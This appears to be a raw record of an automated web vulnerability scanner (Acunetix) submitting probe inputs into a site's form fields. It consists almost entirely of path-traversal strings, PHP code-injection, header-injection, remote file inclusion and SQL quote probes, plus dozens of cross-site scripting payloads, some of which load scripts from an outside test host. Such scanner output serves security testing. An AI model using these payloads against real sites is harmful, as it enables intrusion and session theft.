answers: almost positive
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: V4
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: V3
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: V5
B9: ..\..\..\..\..\..\..\..\boot.ini
answers: almost positive
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V2
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V4
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V3
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V5
B9: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
answers: V2
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: almost positive
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: V3
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: almost positive
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: V5
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: V4
B9: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
answers: V2
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: V5
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: V4
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: V3
B9: <..\..\..\..\..\..\..\..\boot.ini
answers: V5
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: almost positive
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: V2
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: V3
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: V4
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V4
B9: |..\..\..\..\..\..\..\..\boot.ini
answers: almost positive
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V5
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V2
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: V3
B9: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
answers: almost positive
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: /some_inexistent_file_with_long_name
B9: Submit
answers: http://some-inexistent-website.com/some_inexistent_file_with_long_name
B9: Submit
answers: V2
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: V5
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: http://testphp.acunetix.com/acunetix_file_inclusion_test?
B9: Submit
answers: V3
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: V4
B9: http://some-inexistent-website.com/some_inexistent_file_with_long_name
answers: V3
B9: /some_inexistent_file_with_long_name
answers: almost positive
B9: /some_inexistent_file_with_long_name
answers: V4
B9: /some_inexistent_file_with_long_name
answers: V2
B9: /some_inexistent_file_with_long_name
answers: V5
B9: /some_inexistent_file_with_long_name
answers: V2
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: almost positive
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: V3
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: V4
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: V5
B9: http://testphp.acunetix.com/acunetix_file_inclusion_test?
answers: dark_ages.htm.html
B9: Submit
answers: acunetix_wvs_invalid_filename
B9: Submit
answers: dark_ages.htm
B9: Submit
answers: V2
B9: acunetix_wvs_invalid_filename
answers: almost positive
B9: acunetix_wvs_invalid_filename
answers: V3
B9: acunetix_wvs_invalid_filename
answers: V3
B9: dark_ages.htm
answers: V2
B9: dark_ages.htm
answers: V5
B9: acunetix_wvs_invalid_filename
answers: dark_ages.htm.jpg
B9: Submit
answers: V4
B9: acunetix_wvs_invalid_filename
answers: V5
B9: dark_ages.htm
answers: almost positive
B9: dark_ages.htm
answers: V4
B9: dark_ages.htm
answers: V5
B9: dark_ages.htm.jpg
answers: almost positive
B9: dark_ages.htm.jpg
answers: V5
B9: dark_ages.htm.html
answers: almost positive
B9: dark_ages.htm.html
answers: V3
B9: dark_ages.htm.jpg
answers: V4
B9: dark_ages.htm.html
answers: V2
B9: dark_ages.htm.jpg
answers: V4
B9: dark_ages.htm.jpg
answers: V3
B9: dark_ages.htm.html
answers: V2
B9: dark_ages.htm.html
answers: almost positive
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V2
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers:
SomeCustomInjectedHeader:injected_by_wvs
B9: Submit
answers:
SomeCustomInjectedHeader:injected_by_wvs
B9: Submit
answers: V5
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V4
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V3
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: almost positive
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V2
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V4
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V3
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: V5
B9:
SomeCustomInjectedHeader:injected_by_wvs
answers: http://www.acunetix-long-name-with-some-inexistent-host.tst/
B9: Submit
answers: almost positive
B9: http://www.acunetix-long-name-with-some-inexistent-host.tst/
answers: V5
B9: http://www.acunetix-long-name-with-some-inexistent-host.tst/
answers: V2
B9: http://www.acunetix-long-name-with-some-inexistent-host.tst/
answers: V3
B9: http://www.acunetix-long-name-with-some-inexistent-host.tst/
answers: V4
B9: http://www.acunetix-long-name-with-some-inexistent-host.tst/
answers: V3
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V4
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V5
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V2
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V5
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: almost positive
B9: ';printf(md5(acunetix_wvs_security_test));exit;//
answers: V2
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: V3
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: almost positive
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: V4
B9: ";printf(md5(acunetix_wvs_security_test));exit;//
answers: V2
B9: '"
answers: /
B9: Submit
answers: V3
B9: '"
answers: almost positive
B9: '"
answers: V4
B9: '"
answers: '"
B9: Submit
answers: almost positive
B9: /
answers: V5
B9: '"
answers: V4
B9: /
answers: V3
B9: /
answers: V2
B9: /
answers: V5
B9: /
answers: )
B9: Submit
answers: V4
B9: )
answers: V2
B9: )
answers: V3
B9: )
answers: almost positive
B9: )
answers: almost positive
B9: !(()
answers: V5
B9: )
answers: V2
B9: !(()
answers: !(()
B9: Submit
answers: V4
B9: !(()
answers: V5
B9: !(()
answers: V3
B9: !(()
answers: V3
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
B9: Submit
answers: almost positive
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: V4
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: almost positive
B9:
Set-Cookie: cookiename=cookievalue
answers: V5
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: V2
B9: <meta http-equiv='Set-cookie' content='cookiename=cookievalue'>
answers: V2
B9:
Set-Cookie: cookiename=cookievalue
answers: V3
B9:
Set-Cookie: cookiename=cookievalue
answers:
Set-Cookie: cookiename=cookievalue
B9: Submit
answers: V4
B9:
Set-Cookie: cookiename=cookievalue
answers: V5
B9:
Set-Cookie: cookiename=cookievalue
answers: http://www.acunetix.com
B9: Submit
answers: V2
B9: http://www.acunetix.com
answers: almost positive
B9: http://www.acunetix.com
answers: V3
B9: http://www.acunetix.com
answers: V4
B9: http://www.acunetix.com
answers: V5
B9: http://www.acunetix.com
answers: 268435455
B9: Submit
answers: \'\");|]*{
<
B9: Submit
answers: 0
B9: Submit
answers:
B9: Submit
answers: -268435455
B9: Submit
answers: 0x3fffffff
B9: Submit
answers: NULL
B9: Submit
answers: 0x80000000
B9: Submit
answers: 0xffffffff
B9: Submit
answers: almost positive
B9:
answers: V3
B9:
answers: V2
B9:
answers: 0x7fffffff
B9: Submit
answers: V4
B9:
answers: almost positive
B9: 268435455
answers: V3
B9: 268435455
answers: V2
B9: 268435455
answers: V5
B9:
answers: V4
B9: 268435455
answers: V5
B9: 268435455
answers: V2
B9: -268435455
answers: 65536
B9: Submit
answers: V3
B9: -268435455
answers: almost positive
B9: -268435455
answers: V4
B9: -268435455
answers: -1.0
B9: Submit
answers: V5
B9: -268435455
answers: V2
B9: \'\");|]*{
<
answers: V4
B9: \'\");|]*{
<
answers: V5
B9: \'\");|]*{
<
answers: almost positive
B9: \'\");|]*{
<
answers: V3
B9: \'\");|]*{
<
answers: almost positive
B9: Submit
answers: V2
B9: Submit
answers: V5
B9: Submit
answers: V3
B9: Submit
answers: almost positive
B9: 0
answers: V4
B9: Submit
answers: V3
B9: 0
answers: V2
B9: 0
answers: almost positive
B9: NULL
answers: V5
B9: 0
answers: V5
B9: NULL
answers: V4
B9: 0
answers: V3
B9: NULL
answers: V4
B9: NULL
answers: V2
B9: NULL
answers: almost positive
B9: 0x3fffffff
answers: V2
B9: 0x3fffffff
answers: V3
B9: 0x3fffffff
answers: almost positive
B9: 0x80000000
answers: V3
B9: 0x80000000
answers: V5
B9: 0x3fffffff
answers: V4
B9: 0x3fffffff
answers: V2
B9: 0x80000000
answers: V5
B9: 0x80000000
answers: V4
B9: 0x80000000
answers: almost positive
B9: 0x7fffffff
answers: V3
B9: 0x7fffffff
answers: almost positive
B9: 0xffffffff
answers: V4
B9: 0x7fffffff
answers: V2
B9: 0x7fffffff
answers: V5
B9: 0x7fffffff
answers: V3
B9: 0xffffffff
answers: V2
B9: 0xffffffff
answers: V4
B9: 0xffffffff
answers: V5
B9: 0xffffffff
answers: almost positive
B9: -1.0
answers: V4
B9: -1.0
answers: V5
B9: -1.0
answers: V3
B9: -1.0
answers: almost positive
B9: 65536
answers: V4
B9: 65536
answers: V5
B9: 65536
answers: V3
B9: 65536
answers: V2
B9: -1.0
answers: V2
B9: 65536
answers: almost positive
B9: Submit
answers: almost positive
B9: Submit
answers: almost positive
B9: Submit
answers: almost positive
B9: Submit
answers: almost positive
B9: Submit
answers: '
B9: Submit
answers: acunetix'"
B9: Submit
answers: '
B9: Submit
answers: %27
B9: Submit
answers: \'
B9: Submit
answers: \"
B9: Submit
answers: JyI=
B9: Submit
answers: almost positive
B9: %27
answers: almost positive
B9: '
answers: almost positive
B9: \'
answers: almost positive
B9: '
answers: V2
B9: '
answers: almost positive
B9: \"
answers: almost positive
B9: acunetix'"
answers: almost positive
B9: JyI=
answers: V2
B9: '
answers: V2
B9: %27
answers: V2
B9: acunetix'"
answers: V2
B9: \'
answers: V3
B9: '
answers: V3
B9: %27
answers: V2
B9: \"
answers: V3
B9: \'
answers: V3
B9: '
answers: V2
B9: JyI=
answers: V3
B9: acunetix'"
answers: V3
B9: \"
answers: V3
B9: JyI=
answers: V4
B9: %27
answers: V4
B9: acunetix'"
answers: V4
B9: '
answers: V5
B9: %27
answers: V4
B9: '
answers: V4
B9: \"
answers: V5
B9: '
answers: V4
B9: \'
answers: V4
B9: JyI=
answers: V5
B9: '
answers: V5
B9: \'
answers: V5
B9: acunetix'"
answers: V5
B9: \"
answers: V5
B9: JyI=
answers: acu9e8f7a98e4b7d76e15fc6073be4c00d9
B9: Submit
answers: almost positive
B9: acu035ff900376e4d2afb6840c6fb04939b
answers: <script>alert(415128106148)</script>
B9: Submit
answers: <ScRiPt
>alert(415138106148);</ScRiPt>
B9: Submit
answers: >'><ScRiPt
>alert(415148106148);</ScRiPt>
B9: Submit
answers: >"><ScRiPt
>alert(415158106148);</ScRiPt>
B9: Submit
answers: email@some<ScRiPt
>alert(415198106148);</ScRiPt>domain.com
B9: Submit
answers: </textarea><ScRiPt
>alert(415168106148);</ScRiPt>
B9: Submit
answers: [img]JaVaScRiPt:alert(415208106148)[/img]
B9: Submit
answers: </title><ScRiPt
>alert(415178106148);</ScRiPt>
B9: Submit
answers: almost positive
B9: <script>alert(415228106150)</script>
answers: --><ScRiPt
>alert(415188106148);</ScRiPt>
B9: Submit
answers: <img src="JaVaScRiPt:alert(415218106148);">
B9: Submit
answers: almost positive
B9: >"><ScRiPt
>alert(415258106150);</ScRiPt>
answers: almost positive
B9: >'><ScRiPt
>alert(415248106150);</ScRiPt>
answers: almost positive
B9: <ScRiPt
>alert(415238106150);</ScRiPt>
answers: almost positive
B9: email@some<ScRiPt
>alert(415298106150);</ScRiPt>domain.com
answers: almost positive
B9: --><ScRiPt
>alert(415288106150);</ScRiPt>
answers: almost positive
B9: </textarea><ScRiPt
>alert(415268106150);</ScRiPt>
answers: almost positive
B9: </title><ScRiPt
>alert(415278106150);</ScRiPt>
answers: almost positive
B9: <img src="JaVaScRiPt:alert(415318106150);">
answers: almost positive
B9: [img]JaVaScRiPt:alert(415308106150)[/img]
answers: <script>alert(415338106819);</script>
B9: Submit
answers: <scrip<script>t>alert(415348106819);</scrip</script>t>
B9: Submit
answers: <DIV STYLE="width:expression(alert(415358106819));">
B9: Submit
answers: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(415368106819);"></FRAMESET>
B9: Submit
answers: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="415398106819">
B9: Submit
answers: <img dynsrc="JaVaScRiPt:alert(415378106819);">
B9: Submit
answers: <embed src="http://testphp.acunetix.com/xss.swf?415408106819" type="application/x-shockwave-flash"/>
B9: Submit
answers: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(415388106819);">
B9: Submit
answers: almost positive
B9: <script>alert(415438107786);</script>
answers: almost positive
B9: <scrip<script>t>alert(415448107786);</scrip</script>t>
answers: <ScRiPt src=http://testphp.acunetix.com/xss.js?415428106819></ScRiPt>
B9: Submit
answers: <body onload=alert(415418106819)>
B9: Submit
answers: almost positive
B9: <DIV STYLE="width:expression(alert(415458107786));">
answers: almost positive
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(415468107786);"></FRAMESET>
answers: almost positive
B9: <img dynsrc="JaVaScRiPt:alert(415478107786);">
answers: almost positive
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(415488107786);">
answers: almost positive
B9: <body onload=alert(415518107786)>
answers: almost positive
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?415528107786></ScRiPt>
answers: almost positive
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="415498107786">
answers: almost positive
B9: <embed src="http://testphp.acunetix.com/xss.swf?415508107786" type="application/x-shockwave-flash"/>
answers: <script/xss src=http://testphp.acunetix.com/xss.js?415548108233></script>
B9: Submit
answers: ' style='background:url(JaVaScRiPt:alert(415568108233))' invalidparam='
B9: Submit
answers: %3CScRiPt%3Ealert(415578108233);%3C/ScRiPt%3E
B9: Submit
answers: <img src=http://testphp.acunetix.com/dot.gif onload=alert(415558108233)>
B9: Submit
answers: </div><ScRiPt
>alert(415608108233);</ScRiPt>
B9: Submit
answers: " onmouseover=alert(415598108233)
B9: Submit
answers: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?415588108233"></ScRiPt>
B9: Submit
answers: almost positive
B9: <script/xss src=http://testphp.acunetix.com/xss.js?415648108360></script>
answers: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(415618108233)+ADsAPA-/ScRiPt+AD4-
B9: Submit
answers: "'><ScRiPt
>alert(415638108233);</ScRiPt>
B9: Submit
answers: almost positive
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(415658108360)>
answers: '"><ScRiPt
>alert(415628108233);</ScRiPt>
B9: Submit
answers: almost positive
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?415688108360"></ScRiPt>
answers: almost positive
B9: " onmouseover=alert(415698108360)
answers: almost positive
B9: ' style='background:url(JaVaScRiPt:alert(415668108360))' invalidparam='
answers: almost positive
B9: %3CScRiPt%3Ealert(415678108360);%3C/ScRiPt%3E
answers: almost positive
B9: </div><ScRiPt
>alert(415708108360);</ScRiPt>
answers: almost positive
B9: '"><ScRiPt
>alert(415728108360);</ScRiPt>
answers: almost positive
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(415718108360)+ADsAPA-/ScRiPt+AD4-
answers: almost positive
B9: "'><ScRiPt
>alert(415738108360);</ScRiPt>
answers: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
B9: Submit
answers: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
B9: Submit
answers: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
B9: Submit
answers: ACUstart415798109164'";ACUend
B9: Submit
answers: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
B9: Submit
answers: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(415808109164);%uff1c/script%uff1e
B9: Submit
answers: </xss/*-*/style=xss:e/**/xpression(alert(415828109164))>
B9: Submit
answers: javascript:alert(415838109166)
B9: Submit
answers: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(415818109164);%uff1c/script%uff1e
B9: Submit
answers: ;acunetix:expr/**/ession(alert(415848109166));
B9: Submit
answers: almost positive
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: almost positive
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: almost positive
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(415908109235);%uff1c/script%uff1e
answers: almost positive
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: almost positive
B9: ACUstart415898109235'";ACUend
answers: almost positive
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: almost positive
B9: ;acunetix:expr/**/ession(alert(415948109235));
answers: almost positive
B9: </xss/*-*/style=xss:e/**/xpression(alert(415928109235))>
answers: almost positive
B9: javascript:alert(415938109235)
answers: almost positive
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(415918109235);%uff1c/script%uff1e
answers: <iframe/ /onload=alert(415958109598)></iframe>
B9: Submit
answers: almost positive
B9: <iframe/ /onload=alert(415968109705)></iframe>
answers: V2
B9: acu81c38341e51c2360fb60e9bad7445d15
answers: V2
B9: <ScRiPt
>alert(415998110443);</ScRiPt>
answers: V2
B9: <script>alert(415988110443)</script>
answers: V2
B9: >"><ScRiPt
>alert(416018110443);</ScRiPt>
answers: V2
B9: >'><ScRiPt
>alert(416008110443);</ScRiPt>
answers: V2
B9: email@some<ScRiPt
>alert(416058110443);</ScRiPt>domain.com
answers: V2
B9: </textarea><ScRiPt
>alert(416028110443);</ScRiPt>
answers: V2
B9: [img]JaVaScRiPt:alert(416068110443)[/img]
answers: V2
B9: --><ScRiPt
>alert(416048110443);</ScRiPt>
answers: V2
B9: <img src="JaVaScRiPt:alert(416078110443);">
answers: V2
B9: </title><ScRiPt
>alert(416038110443);</ScRiPt>
answers: V2
B9: <scrip<script>t>alert(416098111138);</scrip</script>t>
answers: V2
B9: <DIV STYLE="width:expression(alert(416108111138));">
answers: V2
B9: <script>alert(416088111138);</script>
answers: V2
B9: <img dynsrc="JaVaScRiPt:alert(416128111138);">
answers: V2
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(416118111138);"></FRAMESET>
answers: V2
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(416138111138);">
answers: V2
B9: <embed src="http://testphp.acunetix.com/xss.swf?416158111138" type="application/x-shockwave-flash"/>
answers: V2
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="416148111138">
answers: V2
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?416178111138></ScRiPt>
answers: V2
B9: <body onload=alert(416168111138)>
answers: V2
B9: <script/xss src=http://testphp.acunetix.com/xss.js?416188111461></script>
answers: V2
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(416198111461)>
answers: V2
B9: ' style='background:url(JaVaScRiPt:alert(416208111461))' invalidparam='
answers: V2
B9: </div><ScRiPt
>alert(416248111461);</ScRiPt>
answers: V2
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?416228111461"></ScRiPt>
answers: V2
B9: " onmouseover=alert(416238111461)
answers: V2
B9: %3CScRiPt%3Ealert(416218111461);%3C/ScRiPt%3E
answers: V2
B9: '"><ScRiPt
>alert(416268111461);</ScRiPt>
answers: V2
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(416258111461)+ADsAPA-/ScRiPt+AD4-
answers: V2
B9: "'><ScRiPt
>alert(416278111461);</ScRiPt>
answers: V2
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V2
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V2
B9: ACUstart416328111948'";ACUend
answers: V2
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V2
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: V2
B9: javascript:alert(416368111948)
answers: V2
B9: </xss/*-*/style=xss:e/**/xpression(alert(416358111948))>
answers: V2
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(416348111948);%uff1c/script%uff1e
answers: V2
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(416338111948);%uff1c/script%uff1e
answers: V2
B9: ;acunetix:expr/**/ession(alert(416378111948));
answers: V2
B9: <iframe/ /onload=alert(416388112467)></iframe>
answers: V3
B9: acu752e99b8dae77d6d33e83bb24a5e176d
answers: V3
B9: <script>alert(416408113933)</script>
answers: V3
B9: >"><ScRiPt
>alert(416438113933);</ScRiPt>
answers: V3
B9: </textarea><ScRiPt
>alert(416448113933);</ScRiPt>
answers: V3
B9: <ScRiPt
>alert(416418113933);</ScRiPt>
answers: V3
B9: >'><ScRiPt
>alert(416428113933);</ScRiPt>
answers: V3
B9: </title><ScRiPt
>alert(416458113933);</ScRiPt>
answers: V3
B9: --><ScRiPt
>alert(416468113933);</ScRiPt>
answers: V3
B9: <img src="JaVaScRiPt:alert(416498113933);">
answers: V3
B9: email@some<ScRiPt
>alert(416478113933);</ScRiPt>domain.com
answers: V3
B9: [img]JaVaScRiPt:alert(416488113933)[/img]
answers: V3
B9: <script>alert(416508114411);</script>
answers: V3
B9: <scrip<script>t>alert(416518114411);</scrip</script>t>
answers: V3
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(416538114411);"></FRAMESET>
answers: V3
B9: <img dynsrc="JaVaScRiPt:alert(416548114411);">
answers: V3
B9: <DIV STYLE="width:expression(alert(416528114411));">
answers: V3
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="416568114411">
answers: V3
B9: <embed src="http://testphp.acunetix.com/xss.swf?416578114411" type="application/x-shockwave-flash"/>
answers: V3
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(416558114411);">
answers: V3
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?416598114411></ScRiPt>
answers: V3
B9: <body onload=alert(416588114411)>
answers: V3
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(416618114908)>
answers: V3
B9: <script/xss src=http://testphp.acunetix.com/xss.js?416608114908></script>
answers: V3
B9: %3CScRiPt%3Ealert(416638114908);%3C/ScRiPt%3E
answers: V3
B9: ' style='background:url(JaVaScRiPt:alert(416628114908))' invalidparam='
answers: V3
B9: </div><ScRiPt
>alert(416668114908);</ScRiPt>
answers: V3
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?416648114908"></ScRiPt>
answers: V3
B9: " onmouseover=alert(416658114908)
answers: V3
B9: "'><ScRiPt
>alert(416698114910);</ScRiPt>
answers: V3
B9: '"><ScRiPt
>alert(416688114910);</ScRiPt>
answers: V3
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(416678114908)+ADsAPA-/ScRiPt+AD4-
answers: V3
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V3
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V3
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V3
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(416758116521);%uff1c/script%uff1e
answers: V3
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: V3
B9: javascript:alert(416788116523)
answers: V3
B9: </xss/*-*/style=xss:e/**/xpression(alert(416778116523))>
answers: V3
B9: ;acunetix:expr/**/ession(alert(416798116523));
answers: V3
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(416768116523);%uff1c/script%uff1e
answers: V3
B9: ACUstart416748116521'";ACUend
answers: V3
B9: <iframe/ /onload=alert(416808119194)></iframe>
answers: V4
B9: acua36da5bb26588355fafe073f1a308049
answers: V4
B9: <script>alert(416828121001)</script>
answers: V4
B9: >'><ScRiPt
>alert(416848121001);</ScRiPt>
answers: V4
B9: <ScRiPt
>alert(416838121001);</ScRiPt>
answers: V4
B9: >"><ScRiPt
>alert(416858121001);</ScRiPt>
answers: V4
B9: </textarea><ScRiPt
>alert(416868121001);</ScRiPt>
answers: V4
B9: </title><ScRiPt
>alert(416878121001);</ScRiPt>
answers: V4
B9: <img src="JaVaScRiPt:alert(416918121001);">
answers: V4
B9: email@some<ScRiPt
>alert(416898121001);</ScRiPt>domain.com
answers: V4
B9: --><ScRiPt
>alert(416888121001);</ScRiPt>
answers: V4
B9: [img]JaVaScRiPt:alert(416908121001)[/img]
answers: V4
B9: <script>alert(416928121482);</script>
answers: V4
B9: <scrip<script>t>alert(416938121482);</scrip</script>t>
answers: V4
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(416958121482);"></FRAMESET>
answers: V4
B9: <DIV STYLE="width:expression(alert(416948121482));">
answers: V4
B9: <img dynsrc="JaVaScRiPt:alert(416968121482);">
answers: V4
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(416978121482);">
answers: V4
B9: <body onload=alert(417008121482)>
answers: V4
B9: <embed src="http://testphp.acunetix.com/xss.swf?416998121482" type="application/x-shockwave-flash"/>
answers: V4
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="416988121482">
answers: V4
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?417018121482></ScRiPt>
answers: V4
B9: <script/xss src=http://testphp.acunetix.com/xss.js?417028122137></script>
answers: V4
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(417038122137)>
answers: V4
B9: ' style='background:url(JaVaScRiPt:alert(417048122137))' invalidparam='
answers: V4
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(417098122137)+ADsAPA-/ScRiPt+AD4-
answers: V4
B9: %3CScRiPt%3Ealert(417058122137);%3C/ScRiPt%3E
answers: V4
B9: </div><ScRiPt
>alert(417088122137);</ScRiPt>
answers: V4
B9: '"><ScRiPt
>alert(417108122137);</ScRiPt>
answers: V4
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?417068122137"></ScRiPt>
answers: V4
B9: " onmouseover=alert(417078122137)
answers: V4
B9: "'><ScRiPt
>alert(417118122137);</ScRiPt>
answers: V4
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V4
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V4
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V4
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(417178122565);%uff1c/script%uff1e
answers: V4
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: V4
B9: ACUstart417168122565'";ACUend
answers: V4
B9: javascript:alert(417208122565)
answers: V4
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(417188122565);%uff1c/script%uff1e
answers: V4
